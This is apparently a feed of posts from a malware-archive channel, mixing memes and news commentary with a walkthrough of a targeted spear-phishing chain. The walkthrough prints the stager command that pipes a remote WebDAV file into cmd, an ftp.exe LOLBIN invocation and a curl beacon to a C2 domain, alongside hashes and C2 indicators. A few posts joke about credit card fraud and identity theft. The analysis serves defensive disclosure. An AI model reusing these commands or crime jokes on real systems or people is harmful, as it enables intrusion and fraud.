40629
The largest collection of malware source, samples, and papers on the internet. Password: infected https://vx-underground.org/
Today Reuters reported that Spanish authorities arrested the leader of KillSec ransomware group. He is 16 years old.
Who are these people bro? When I was 16 I was being a nerd and doing malware stuff, but I also was doing stuff like talking to girls, learning how to drive, going to school events, etc.
How are you going to do international cybercrime at 16? You're only a kid once, enjoy being a kid and having some freedom.
Go outside, touch some grass, hold a girls hand, throw a ball, look at silly pictures of cats.
Pic unrelated
Apologies to any government agency in advance if I bamboozled their espionage campaign. Someone sent me the goop and I thought it was cool. I liked all the chains, but the final payload wasn't very good, truthfully. It works, but it could be heavily improved upon
Читать полностью…
Interestingly, this malware is very, very, VERY specifically directed toward individuals, or organizations, which may be attending the AmCham 2026 Gala in Astana, Kazakhstan which is on October 16, 2026
Читать полностью…
> mcdonalds rolling out new SUPER INTELLIGENCE
> archy
> INTELLIGENTLY changes pricing
> store 1: $5.69 for burger
> drive down rode
> two miles away
> store 2: $6.89 for burger
> archy trained on 14,000 restaurants
> archy learned who willing to pay more
FBI Director Kash Patel, and the FBI accounts on social media, been talking about ShinyHunters on Xitter all day.
God damn bro, they're so fucking mad about the compromise and defacement. I haven't seen the FBI this rustled in a hot minute
I know I probably shouldn't be so rude about it, but for real bro, if you just say, "There is malware on Steam", what am I supposed to do with this information?
Читать полностью…
> be me
> get dm
> "Smelly, you said you accidentally executed an information stealer on your PC. What happens if you accidentally executed ransomware on your PC?"
p much this tbh (ive done it before with REvil)
Yeah, so I decided to check out the Steam goop people were DMing me about.
Basically there is something called People's Playground (I have no idea what that is) and they started discussing a malicious Steam mod thingie surrounding it. However, the malware is not specific to them but is a much more broad issue.
Interestingly, this is a Steam mod worm. I have never seen anything like this before. I found it very silly.
What I did not find silly, and I actually found it very ... confusing ... was the payload in all of this. Once this Steam worm thingie is detonated on your machine it
- Deletes browser cookies (???)
- Deletes photos from "MyPictures" on Windows
- Deletes videos from "MyVideos" on Windows
- Tries to "destroy" Steam friends, apps, etc
Throughout the entire payload I was looking for something else, like data exfiltration, or a broader malware campaign, ... but all this does is try to fuck up Steam, delete gunk off your computer, and then self-spreads by making the Steam user publish a mod.
Some gamer nerd guy person did a write-up on it. I'll link it. I verified everything they wrote and they're correct on it.
I just don't get it though. This guy could have had a semi-successful information stealer campaign, or pay-per-install campaign, ... or crypto theft, ... or anything. but all it does is fuck up your Steam locally.
Like, all you need to do is reinstall Steam. I don't understand.
Big news for malware enthusiasts: I've uploaded an additional 170,000+ malwares to the internet
Bigger news for silly pictures of cats enthusiasts: I've attached one to this post
> "Two sources familiar with the matter ..."
Dawg, they defaced the fucking FBIs website and published a letter online THREATENING THEM. They're EXTORTING the United States government.
Only TWO sources??? 99% of cybersecurity nerds have seen the letter. But .. TWO SOURCES???
fbi job portal defaced and compromised? oh yeah, it's a silly tuesday
Читать полностью…
For the record this is a joke. Do not commit identity theft. That is very bad. Crime is bad and illegal
Читать полностью…
Chat, you're never going to believe it.
Over the weekend I visited a family members child's birthday party.
Fast forward approx. 48 hours and I am sick.
Who could have imagined a dozen children would have been a vector for disease?
Behind the scenes update on malware reverse engineering explained for noobs.
We're at the 16 minute marker and we've got quite a bit ways to go. This video will probably be 30 minutes or longer when it's done.
You're all a bunch of God damn degenerates and you CANNOT be trusted.
I asked if anyone had any video requests (implying the subject would be malware), because I'm beginning to find video creation kind of fun, and everyone immediately just starts talking about making videos about femboys and documentaries about cats
I don't even know why I ask you stinky nerds anything
Pic unrelated
> be chinese financially motivated threat actor
> create big ass fuck off botnet
> botnet transforms machines into proxies
> sell proxies on IPweb
> make big money
> millions of dollars
> accidentally push source code of botnet to GitHub
> accidentally push source code of botnet to GitHub
> synthient finds it
> hello mr synthient can i have the goop code?
> "sure?"
> gives
> download it
thank you mysterious group of chinese people for accidentally uploading your botnet code to github. i have goop code now
Last time on Dragon Ball Z: someone sent me goop (malware) which successfully evaded their EDR and all AVs. It also passed everything on VirusTotal for static-analysis.
They sent it to me to bonk with a stick, bonking this whole thing would take me a long time, and I'm not going to do that. I wanted to determine what it was doing, etc.
My knowledge on state-sponsored activity and geopolitics in the CIS (Commonwealth of Independent States, ex-Soviet countries) is rusty. However, based on the nature of this goop I would be willing to bet 4 silly pictures of cats this is a state-sponsored malware campaign.
1. The file (a .rar) sent is a fake invitation to the AmCham Kazakhstan's 2026 Gala (or so I assume based on some Google searches) which is happening October 16th, 2026, in Astana, Kazakhstan
2. The file contains two files. A .xz file (unsure what it does still at this time, but it's a JPEG, not a real archive) and a .url file (internet shortcut). The internet shortcut is named "Scanned Image". Likely a masquerading technique.
3. The .url file connects via WebDAV to "file://rappellingaart.com@SSL/secure-docs/3". This directory contains a .lnk (Windows shortcut) and a .ico (Icon file).
4. This is a masquerading effort, the end user must execute the .lnk file to proceed to the remaining payload. The WebDAV appears as a regular directory in File Explorer on Windows
5. The .lnk executes FTP.exe inside System32 and passes the WebDAV path to the .ico file as a LOLBIN, as this: "ftp.exe -s:icon.ico"
6. The .ico acts as a command template and does "!more \\rappellingaart.com@SSL\secure-docs\res.ico|cmd"
7. The res.ico file, which is piped into CMD.exe, creates a series of scheduled tasks, most notably it connects to gomescareerplans(.)com and performs a CURL on the domain under /docs/?vid=%computername%" as a way to register the machine that it has been infected by their payload
8. The res.ico also references the WebDAV URL again and performs a silent installation of "Imp_Details.msi" from \\rappellingaart.com@SSL\secure-docs\Imp_Details.msi
9. Imp_Details.msi contains a section internally labeled Binary._2E9D1C8BAC5D0F288E61BF5987C52203
10. This section is a RAT written in C++. It has a lot of features, lots of different commands, way too much for me to reverse engineer quickly. However, it does internally perform a XOR on a string. It reveals the C2 for the RAT delivered is chestergreenfarming(.)com
Invitation .rar:
2fa7498a3bda849c8c5a0e0869708ff113379d54197109a5cdfaea0155e878c9
.Url which launches the WebDAV:
613b6569bd8a4cd75ab11ee9682dd690fabfb11d5c1103caf2ba086e006da034
Weird .xz:
fec4f301a1be36a42ec27208e13b5d1d3d0bbe0f1ab47bbab863a7ca9923c571
.ico file (stager):
c27ca16248e04f6535ae3e6d1670d740b3884f0fa64935ddfd39faf712f4175d
.ico (C2 register, task scheduler):
f1060a81c9f68d6f3d23e28f2a1af50fa18ecb9b0a763ca5dcd4b294b6a3593c
.MSI (pulled from .ico task scheduler):
4008c8f9e52d3e6fd7df4a980a9a78f46f2412ba2fda10a38aa92d338767c54c
.exe inside of .MSI:
5d8df4c2d08cff5f1c0de8eab56e47ae543bd5c6d2ef04573f61ebb9fbc65716
WebDAV:
rappellingaart(.)com
C2 register:
gomescareerplans(.)com
RAT C2:
chestergreenfarming(.)com
> be me
> get dm
> "smelly i found goop"
> wtf i love goop (malware)
> "i work for a company that manages company networks, a customer got sent some files that evades our EDR, all AVs, and passed everything on VirusTotal"
> wtf lol
> ok
> download files
> look inside
> not regular goop at all
> big swinging dick goop
Chat, this is not the regular type of goop I see. This goop is very specially written, highly tailored to target very, very, very specific groups of companies, and is doing some really interesting stuff. I am very happy with this goop.
> be me
> get on beep boop
> us gov executive order
> affects executive branch
> CIA, ICE, NSA, FBI, Cabinet, etc
> AI must now be called SI
> "Super Intelligence"
> ???
> why lol
> look inside
> Trump says AI not good description
> says AI is "very powerful"
> says AI is "very brilliant"
> says SI is better name
> Trump acts science advisor to submit legislation to Congress
> wants SI on all court documents too
I DON'T UNDERSTAND WHY. HE LITERALLY JUST SAID, VERBATIM, ITS VERY POWERFUL AND VERY BRILLIANT, SO HE MADE AN EXECUTIVE ORDER. WHY SPEND ALL THIS TIME AND RESOURCES TO CHANGE AN ACRONYM. THE FBI AND PENTAGON WERE COMPROMISED RECENTLY. STATE SPONSORED AND FINANCIALLY MOTIVATED THREAT ACTORS ARE YEAR AFTER YEAR DOING MORE DAMAGE. SMALL AND MEDIUM SIZED BUSINESSES NEED HELP. LARGE COMPANIES NEED HELP. WHY DOES AN ACRONYM MATTER.
Picture unrelated
Me explaining to younger family members that in the 80s, 90s, and 2000s, you couldn't be on the internet and use the telephone at the same time. Mom and Dad would yell at you to get off the computer because they needed to call someone or were expecting a phone call
Читать полностью…
I've got like a dozen or so people DMing me about more Steam goop (malware) but NO ONE has the actual goop to show me.
GIVE ME THE GOOP BEFORE ANYTHING ELSE.
oHhH SchMellY ThE mAlWaRe iS DoInG SomeThiNg BAd
Okay? What am I supposed to do with this information? Yes, malware (as the name implies) is MALICIOUS. Goop doesn't goop for no reason
Write-up which is factually accurate and cool
https://studiominus.nl/ppg-september-incident/red_analysis.html
My bad, I forgot to attach the upload log thingie
https://vx-underground.org/Updates
Hello, Little People Living Inside My Computer,
I have made a YouTube account to discuss malware reverse engineering and development. It will primarily target noobs. It will be lighthearted, poorly produced, and spontaneous.
MalwareForFun" rel="nofollow">https://www.youtube.com/@MalwareForFun
crime is illegal and for nerds. this is bad and it is criminal. don't compromise the fbi and extort them. that is bad
Читать полностью…
> wake up
> take a shit
> get out of bed
> get on computer
> check xitter
> pornography all over timeline
> ???
> wtf i dont horny on xitter
> realize reposts
> colleague horny posting on main
Seeing a lot of people online discussing the rapidly rising cost of gasoline due to some made up place called Bab El Mandeb and Hormuz.
I'll give you a pro tip to save a few bucks at the pump: credit card fraud
You're welcome
I'm "done" with the first video. I ended up substantially trimming it down and, per some feedback I received, focusing more on the secondary in-memory payload.
It has taken me little over a week to make a video on a malware payload which would normally would only take me like... 30 minutes (or less)
I can't spend over a week discussing a fairly common Malware-as-a-Service payload. I also don't have time to discuss Lumma internals. I initially planned on it, but it's too much for me at the moment.
We have more malware to bonk with a stick.
This is a "demo" run of me bonking malware with a stick videos. I'm weighing on whether or not I want to continue producing videos. It is fun, however it considerably slows me down on other malware thingies I want to look at it.
I dunno.
Here is the final cut:
Randomly remembered when RaidForums got taken down and tons of similar forums appeared to try to fill the vacuum.
One of the first to appear was kkkforum.
The creators were from Brazil, and in Brazil "kkk" essentially means "lol". They didn't realize "kkk" meant something else for native English speakers
I guess it's also possible the resource section segment is decoy data, I haven't finished bonking this with a stick, I'm literally just documenting it as I go. It is as much a mystery to me as it is you (I have no idea what's going on)
Читать полностью…